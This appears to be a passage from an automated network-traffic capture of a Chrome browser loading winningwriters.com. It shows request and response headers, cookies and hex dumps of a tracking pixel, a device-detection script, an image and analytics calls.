                                                                                                                                                                                            2024-11-18 20:00:10 UTC1003OUTGET /i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=e1e54de9-06c4-4a40-9102-eec93f94572b&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=580bb215-95ae-413b-b0c8-e4ee476adf13&tw_document_href=https%3A%2F%2Fwinningwriters.com%2F&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o49bc&type=javascript&version=2.3.31 HTTP/1.1
                                                                                                                                                                                            Host: t.co
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: muc_ads=198b7abe-d754-428d-93d1-280e07e96045; __cf_bm=YvbiLUCv27xU6sXb6u99f5YtcMZtwRaq5lqK8RLL_dQ-1731960009-1.0.1.1-xor7FCo35fsi53YGdQYzYIVvOrY2Iv4cfzo77P27PiGwzQFlpWyshQH__KGy2UqNZtp8B8E7wGUQ2lm861uFAw
                                                                                                                                                                                            2024-11-18 20:00:10 UTC459INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:10 GMT
                                                                                                                                                                                            Content-Type: image/gif;charset=utf-8
                                                                                                                                                                                            Content-Length: 43
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            perf: 7402827104
                                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0
                                                                                                                                                                                            x-transaction-id: 32721bdce22f03ec
                                                                                                                                                                                            strict-transport-security: max-age=0
                                                                                                                                                                                            x-response-time: 6
                                                                                                                                                                                            x-connection-hash: 76d4db5a260f3e9a2c9ba6738985a26183a4b80fc1ddcdf6ab28e105fc1f6a80
                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                            Server: cloudflare tsa_b
                                                                                                                                                                                            CF-RAY: 8e4a8b922ea44620-DFW
                                                                                                                                                                                            2024-11-18 20:00:10 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 09 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                            Data Ascii: GIF89a!,L;


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            92192.168.2.164982366.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC917OUTGET /assets/js/device.min.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960008.60.0.0; _ga=GA1.1.723902191.1731960008
                                                                                                                                                                                            2024-11-18 20:00:10 UTC365INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:10 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "adb-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 2779
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:10 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:10 UTC2779INData Raw: 2f 2a 21 20 64 65 76 69 63 65 2e 6a 73 20 30 2e 31 2e 35 38 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 3b 61 3d 77 69 6e 64 6f 77 2e 64 65 76 69 63 65 2c 77 69 6e 64 6f 77 2e 64 65 76 69 63 65 3d 7b 7d 2c 63 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 6a 3d 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 64 65 76 69 63 65 2e 69 6f 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 28 29 7c 7c 64 65 76 69 63 65 2e 69 70 6f 64 28 29 7c 7c 64 65 76 69 63 65 2e 69 70 61 64 28 29 7d 2c 64 65 76 69 63 65 2e 69 70
                                                                                                                                                                                            Data Ascii: /*! device.js 0.1.58 */(function(){var a,b,c,d,e,f,g,h,i,j;a=window.device,window.device={},c=window.document.documentElement,j=window.navigator.userAgent.toLowerCase(),device.ios=function(){return device.iphone()||device.ipod()||device.ipad()},device.ip


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            93192.168.2.164982466.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC1201OUTGET /graphics/staff/jendi_reiter_by_ezra_autumn_wilde_2023_square_200.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960008.60.0.0; _ga=GA1.1.723902191.1731960008
                                                                                                                                                                                            2024-11-18 20:00:10 UTC371INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:10 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Tue, 19 Dec 2023 19:59:51 GMT
                                                                                                                                                                                            ETag: "13e31-60ce24f3a412a"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 81457
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:10 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:10 UTC7821INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 06 00 00 00 ad 58 ae 9e 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 87 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 31 34 36 32 38 39 39 37 37 37 2c 20 32 30 32 33 2f 30 36 2f 32 35 2d 32 33 3a 35 37 3a
                                                                                                                                                                                            Data Ascii: PNGIHDRXtEXtSoftwareAdobe ImageReadyqe<iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:
                                                                                                                                                                                            2024-11-18 20:00:10 UTC8000INData Raw: 9e f9 fe a1 a5 9b ab 4b 69 c2 aa 26 0f b4 dd ee 38 a1 af a5 d1 f7 8f 3f bc a7 db cb b5 94 79 9f 76 1b 56 a6 b9 84 60 3b fe 3b c2 90 c3 09 e1 19 87 7a fc d5 f2 eb 1d c7 e9 07 fe fd 25 e7 26 d5 aa 16 7e 00 24 9e 40 37 40 19 61 39 2f 97 13 42 51 79 31 6f 04 03 96 c6 09 b4 17 a5 61 8a b3 92 4b 4c b9 81 c1 f2 9d 77 67 b3 1f 19 b1 0b a1 33 78 b8 26 ff 3a 1b 1b d2 8c b7 81 35 73 e8 13 52 e7 df 1a a0 41 bb dd 55 ce 77 43 46 11 e8 b8 85 55 1b d9 50 85 e9 92 23 d6 93 16 49 ab f3 9e 9a 8e 74 7b 7b be 83 8d 77 a4 ca 2b 14 dd a0 fa 5e 3d 9a d4 da 7a 9d 91 47 e3 f0 b0 7b 12 25 85 9c b6 87 47 e9 8b ac 38 ff 83 96 d6 6e 04 11 8e a3 21 1e 6f 28 bb 20 5a 1c ce 04 52 44 76 04 cd 48 70 83 10 d3 5c 76 25 e5 cc 04 63 97 7c 07 15 92 a8 21 82 7a 27 ad 6c 65 2c 11 c5 52 ab 77 ea
                                                                                                                                                                                            Data Ascii: Ki&8?yvV`;;z%&~$@7@a9/BQy1oaKLwg3x&:5sRAUwCFUP#It{{w+^=zG{%G8n!o( ZRDvHp\v%c|!z'le,Rw
                                                                                                                                                                                            2024-11-18 20:00:10 UTC8000INData Raw: 44 0b f8 09 e8 98 04 a1 3f 0c 54 a6 80 63 59 e7 66 83 4f 12 6a 01 47 a7 a5 2f eb 40 9e 31 4f 9c 53 7c c6 94 a4 cb ee 8a 41 42 20 32 f8 bb ee b0 e8 73 9d 3a 0f f9 e7 04 30 da 62 4e 45 28 0e 2c 4c 52 de 94 dd 23 95 f2 5f b1 f5 c3 03 74 2c c8 18 e1 14 0f 13 35 21 ac 48 43 af cf 15 36 af 28 48 4c f0 a6 3c c1 28 47 35 27 41 63 ac 96 81 a7 b7 db 3d dd 1f 95 8e a6 af 26 32 bb b2 3f 3d d0 02 d4 d2 fc 64 d7 ec 21 ae 57 4b 99 fd 5e af d7 02 5a 84 e7 d0 86 92 ed 3a 97 46 e8 94 bd 06 ae 73 a6 43 3e 08 93 3a e9 74 d9 64 64 d9 97 2d 74 42 6d 6f a5 60 c4 b7 3a 62 da ed 0e 52 9a 84 b5 92 fc cd e2 e8 e9 6a 25 21 9f f3 99 3d 43 e1 17 56 15 94 01 33 11 e0 86 43 ad 83 f5 4c bd 54 6a c4 b3 74 61 c4 0c 13 d2 9e a0 d1 4a e8 02 63 5f ce 6b fa e6 66 25 cd 8a f6 ee 40 bb 4e ab 5d
                                                                                                                                                                                            Data Ascii: D?TcYfOjG/@1OS|AB 2s:0bNE(,LR#_t,5!HC6(HL<(G5'Ac=&2?=d!WK^Z:FsC>:tdd-tBmo`:bRj%!=CV3CLTjtaJc_kf%@N]
                                                                                                                                                                                            2024-11-18 20:00:10 UTC8000INData Raw: be c6 12 97 54 5e 4b ae 2c 86 b2 c3 01 2c e7 0f f7 5b da f1 9f f0 28 e8 9e e2 a2 a6 b8 d8 e5 cc 66 09 06 49 e4 f0 a1 db dd 56 20 27 ba e6 4b e3 45 99 1e 0c 46 1b 34 ea 71 64 e0 59 5a a8 e2 46 39 c8 88 18 4e bc 6f 8c e7 7b ee 12 ad a2 1f 13 38 14 cb a4 8c f2 ea ad 10 32 a0 a1 29 6c 25 57 57 d6 f8 ea 65 45 d9 c7 4f 24 df bf 60 61 44 98 d3 09 bc a5 d6 86 26 59 35 ab 9a 2a fb 08 76 75 4c d6 d2 70 6a c1 59 d5 1d 58 90 ef e9 f1 e1 9e ef b9 a3 77 1f ef e8 e3 87 0f f4 81 ff 7c f3 e1 a3 84 68 0b 7e 2d bc f2 cd d5 8a 5e f1 67 5f ae 56 b2 76 19 5c 5c b2 55 ab d2 fa bf c0 df 65 ae 5c e3 e2 8e c3 b0 ed e3 51 c2 b7 35 bf fe 6e bb 93 fe ca 1a 95 aa 30 a3 39 b0 6f ec 31 6e e6 8d e6 33 83 cd 59 c3 0b 54 95 18 b3 5e aa 6c 41 f6 4c 9e 84 4c 5b 85 ea fd c3 86 1e b7 07 09 c5
                                                                                                                                                                                            Data Ascii: T^K,,[(fIV 'KEF4qdYZF9No{82)l%WWeEO$`aD&Y5*vuLpjYXw|h~-^g_Vv\\Ue\Q5n09o1n3YT^lALL[
                                                                                                                                                                                            2024-11-18 20:00:11 UTC8000INData Raw: 49 cf f0 a6 f8 e9 74 43 c3 e1 84 96 7b 1d e1 6c 14 fe 74 51 35 33 af 5b 26 75 02 00 86 90 e8 89 4d 49 5e bc ce 05 68 d0 95 e1 a8 e0 7e 92 ba 40 6a 62 5c 03 8a 6d 40 dc 81 b5 6a f5 28 6e f7 29 e5 34 6d 3e 3a e3 8d d2 e7 7b 06 bb e7 16 15 71 87 37 dc 90 1f d0 82 ea 1c a5 a3 45 5d 16 60 7e 39 0a fe 86 58 68 bb 1c 29 ba bd ae ba cb f2 fd 80 d2 e2 4f 3f 3c a1 d7 de 3b a5 93 8b 11 dd 3e 3a a2 5d ae 29 0f 6f 1c 50 bb 93 0b c6 aa e0 e7 19 89 af 79 21 ee 5f 51 ac 33 94 e5 62 ad 5d 2b f1 60 2f a4 c5 2d 69 35 6a 87 4c e7 5d 88 32 62 35 60 86 9f f2 ef 91 5a 55 40 18 62 01 9e be 50 5a 53 3a ec 37 69 b0 cb 91 b2 db a0 76 af a9 6c be 28 36 95 76 2a 33 03 e3 dc 6a 7b d5 2b 21 aa bb 96 ab 48 f8 44 5e a4 bc 28 c7 0c 3e ad 56 33 d2 a2 02 3c f4 54 0a 0a ea 98 5e 48 d0 15 a5
                                                                                                                                                                                            Data Ascii: ItC{ltQ53[&uMI^h~@jb\m@j(n)4m>:{q7E]`~9Xh)O?<;>:])oPy!_Q3b]+`/-i5jL]2b5`ZU@bPZS:7ivl(6v*3j{+!HD^(>V3<T^H
                                                                                                                                                                                            2024-11-18 20:00:11 UTC8000INData Raw: 4d e1 79 e3 14 ea be d2 92 5b 75 c9 10 15 a2 b8 ec 5c 79 64 6d a5 e9 1e e6 21 5e 6c 23 90 a1 02 fe ef a3 07 67 e5 40 2d 89 14 61 84 50 12 a9 ca 4d eb d7 aa f0 4b 8a b2 c3 16 da ff 06 75 f2 9c 91 dc 95 3a 09 c9 96 bd 78 15 92 4c b9 a1 2e cb 22 38 0c 0a 2b b9 57 11 54 bb ab ee 26 7e 6a 5d 42 52 72 53 b1 70 96 27 2a 2e 2b 0b 36 6c 7a 9a 97 96 d3 51 65 c3 79 d5 f9 dc f7 c6 fd a9 11 66 2c a6 a3 85 ae 17 6f 10 a4 26 d8 2c 49 52 36 08 7c 4b b0 10 c0 9b 13 a9 7f 64 7b 59 be a1 39 ef 8e b5 68 23 e5 f4 17 df ff 3a 7d f6 de b3 d4 e3 7f 3f 83 ca 21 40 79 58 48 79 56 0a 8e d5 38 77 5f 4c 45 37 16 77 15 3e 23 eb da 52 64 f6 09 69 01 6f 9c e9 68 c8 f5 05 1c 98 66 74 31 db d0 94 8b 87 53 7e bf 2b ae 37 7e f9 99 4f d0 e1 c7 1e a3 36 57 12 07 fd 84 2e f8 c4 5f 4e 66 34 e4
                                                                                                                                                                                            Data Ascii: My[u\ydm!^l#g@-aPMKu:xL."8+WT&~j]BRrSp'*.+6lzQeyf,o&,IR6|Kd{Y9h#:}?!@yXHyV8w_LE7w>#Rdiohft1S~+7~O6W._Nf4
                                                                                                                                                                                            2024-11-18 20:00:11 UTC8000INData Raw: ce 7d 8e 4a 0f df 7b 83 37 c3 4c a2 a5 ea 42 71 74 5c cd e5 a8 58 f0 02 ae 77 1b 02 cd 88 38 02 ad 16 33 8b 82 09 7f e7 a6 f0 ba d7 6b 05 27 d6 cd 69 17 ed 56 88 1e 00 be be 59 4c a9 df 1b 70 ee 1d c9 b4 1f f7 61 81 19 07 ee 3f 3a 7e fc 33 43 8e 80 40 0e df d8 e9 c8 69 bb 49 b5 d8 ee 34 31 e1 4e 38 7a 69 91 0e a7 a5 34 35 61 e7 42 bb 4e 85 75 92 6a b5 ba a4 72 0b 99 37 e4 12 49 d6 a9 b2 21 f1 ec 91 8e a1 cd ef 8d 3a 33 8f 88 2d 14 d4 39 5c a6 34 e5 eb fa e4 5e 4f 04 bf fd cc c3 d7 1c 2e 74 41 8b 72 40 17 88 4e 64 8d 12 f5 9f 6f ef f4 24 7d cc 4c 2b 19 a7 bd 7a 94 db cf 4a bd c7 91 23 4f e8 fd ff fd 5f 10 9d 9e d3 c1 6f 7f 89 96 87 7b f4 04 47 f6 f3 7f f6 87 f4 d3 d7 ce 68 fc 70 42 b7 bf fc 34 35 9e be 41 d9 34 35 72 98 7a cb 24 51 d9 8d 53 4e cc b6 a6 5b
                                                                                                                                                                                            Data Ascii: }J{7LBqt\Xw83k'iVYLpa?:~3C@iI41N8zi45aBNujr7I!:3-9\4^O.tAr@Ndo$}L+zJ#O_o{GhpB45A45rz$QSN[
                                                                                                                                                                                            2024-11-18 20:00:11 UTC8000INData Raw: 00 91 3e ce 81 fb 46 64 e9 47 88 80 f9 91 f1 3e 6f 81 12 a7 72 91 ce 4b 41 86 b7 d8 83 05 29 a1 8d ba 1d 24 47 3c 18 89 47 90 08 7a 05 26 cd 2c 6d 60 69 83 a0 0d e3 6c ba 83 ab 8b 1d ec d9 95 c4 db 7e eb af 55 ed de 6e aa 09 50 c3 be ae c1 26 fb 0a 6a 3e 49 1a 63 3c 31 4a de 9d 1b 6c dc b1 f5 11 7e 8c 0d 0d a2 5e 2e a1 4c 09 96 97 e0 47 38 39 a6 96 9c 72 29 f8 c3 51 82 2e dc 00 a4 03 55 af 0a 3c 93 44 9e 3b ae 86 57 d8 4e 38 f2 b8 29 37 70 fb 83 92 a3 b0 61 b9 e8 26 73 42 18 f0 0e 52 ee e0 60 61 fe f3 08 7a fe 19 6d eb 3d 38 bb 41 07 82 3e ff 18 e1 d1 44 c8 2b e4 6d 09 9f 8d 1c e5 59 e7 2e cc 60 ef d4 16 35 cf a3 17 fd 39 09 e6 3a d5 d5 ce 20 79 25 13 61 93 92 54 28 09 32 81 9a 74 4f b9 0c cc 5d 74 19 82 23 8f cd 44 69 42 f7 c3 f3 48 7a 77 c2 e9 ea 61 c8
                                                                                                                                                                                            Data Ascii: >FdG>orKA)$G<Gz&,m`il~UnP&j>Ic<1Jl~^.LG89r)Q.U<D;WN8)7pa&sBR`azm=8A>D+mY.`59: y%aT(2tO]t#DiBHzwa
                                                                                                                                                                                            2024-11-18 20:00:11 UTC8000INData Raw: 7b b4 9c af 12 3c 6c 60 d7 be 83 48 51 1e f5 e4 46 1f 25 bb 0d b8 57 9e a7 67 57 a4 6b b6 44 05 8a ab 6b fc a1 56 96 97 f1 e4 e3 a7 70 e5 ea 1a 86 86 47 b0 79 7c 58 0a 3a ec 9c 1c 02 fa cf a4 3a c8 9a 09 fa d9 06 ae cc 2e c1 fa c5 1a e2 cd 36 e6 ab 1e fc ec 92 07 95 f5 0e b6 47 29 af e2 ca 1f dd d7 e7 bc 93 58 25 28 e3 ae af 0a ad 6a 88 3e 2f e7 4a 4f 3b 03 78 bc 15 47 b5 65 61 b3 cf 8d 1a 19 c1 ec 93 f3 08 0c 8f e1 47 c9 63 78 94 75 be 02 36 32 2b 2b 28 9e 9b c1 99 1f 57 70 e5 94 5b 76 66 3c f5 34 f2 b5 36 ea ee 11 f4 0f 1f c1 a6 4d d3 b0 3d 83 78 66 6d 02 b3 d9 01 a4 5b 31 9c 4b 4d e3 d9 a5 69 3c 70 e9 30 d6 eb 43 08 8d d2 79 89 ba e1 5d 22 c7 5d 76 a3 b1 8d 95 85 73 08 1b e4 04 cd 34 fc 66 a1 69 7d f4 83 1f fa c4 ff 7a ff c7 bc d1 44 92 a0 d4 aa 2a c5
                                                                                                                                                                                            Data Ascii: {<l`HQF%WgWkDkVpGy|X::.6G)X%(j>/JO;xGeaGcxu62++(Wp[vf<46M=xfm[1KMi<p0Cy]"]vs4fi}zD*
                                                                                                                                                                                            2024-11-18 20:00:11 UTC8000INData Raw: b5 26 32 d5 12 02 83 49 04 87 b6 cb e1 75 97 ea 02 9f 40 c9 24 74 22 2a 65 29 ba a9 46 b6 08 e7 f4 02 2a f4 f9 6a b9 25 d8 5e fa 7e d4 2f 95 22 d6 b1 68 35 58 8d cb 85 86 4b 6d 58 a6 d2 59 a9 3a 19 e2 40 4a 92 a8 b3 cc 99 4f d4 b8 3c 68 3a 6a 3e 4a 7a 17 1e b7 38 81 2d 3b 0f 62 64 72 0b ca f5 8e 5e 9c 72 64 97 df d6 92 d0 5c d0 b0 f5 6a ae 90 5a 43 af d9 32 d9 f2 c2 3a 26 77 ee c7 a7 7e f8 38 0e 92 71 5c 7d 61 1e 5f fe dd 0f e3 81 af fc 25 e2 c9 24 19 c7 88 d6 7c b4 7b 3c 64 5d 40 21 a8 cd e9 e8 d5 5f 5b 89 79 7a 14 2b 3c 0f 43 72 81 c3 45 50 9b 57 08 5c 7a 9d 41 7b 2e 44 c2 74 d0 ab 2d fc f3 52 09 cf 71 b9 56 e2 98 89 1c 37 09 29 08 a7 08 76 dd 65 15 b1 dd 55 46 db ad 08 08 43 e1 7e 78 98 68 9c 63 b4 cd 15 ca ac 14 6c 06 e8 10 fb 08 75 b8 dd 49 0c 1f dc
                                                                                                                                                                                            Data Ascii: &2Iu@$t"*e)F*j%^~/"h5XKmXY:@JO<h:j>Jz8-;bdr^rd\jZC2:&w~8q\}a_%$|{<d]@!_[yz+<CrEPW\zA{.Dt-RqV7)veUFC~xhcluI


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            94192.168.2.1649825173.194.76.1574436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC917OUTPOST /g/collect?v=2&tid=G-S2XE0RVPX9&cid=723902191.1731960008&gtm=45je4be0v889608727z8846709124za200zb846709124&aip=1&dma=0&gcd=13l3l3l3l1l1&npa=0&frm=0&tag_exp=101925629~102067554~102067808~102077855~102081484 HTTP/1.1
                                                                                                                                                                                            Host: stats.g.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Origin: https://winningwriters.com
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: test_cookie=CheckForPermission
                                                                                                                                                                                            2024-11-18 20:00:10 UTC849INHTTP/1.1 204 No Content
                                                                                                                                                                                            Access-Control-Allow-Origin: https://winningwriters.com
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:10 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:111:0
                                                                                                                                                                                            Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
                                                                                                                                                                                            Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:111:0"}],}
                                                                                                                                                                                            Server: Golfe2
                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            95192.168.2.1649829104.244.42.674436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:10 UTC865OUTGET /i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=e1e54de9-06c4-4a40-9102-eec93f94572b&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=580bb215-95ae-413b-b0c8-e4ee476adf13&tw_document_href=https%3A%2F%2Fwinningwriters.com%2F&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o49bc&type=javascript&version=2.3.31 HTTP/1.1
                                                                                                                                                                                            Host: analytics.twitter.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: personalization_id="v1_mSmLoy3+5VWQAU9epQPbgw=="
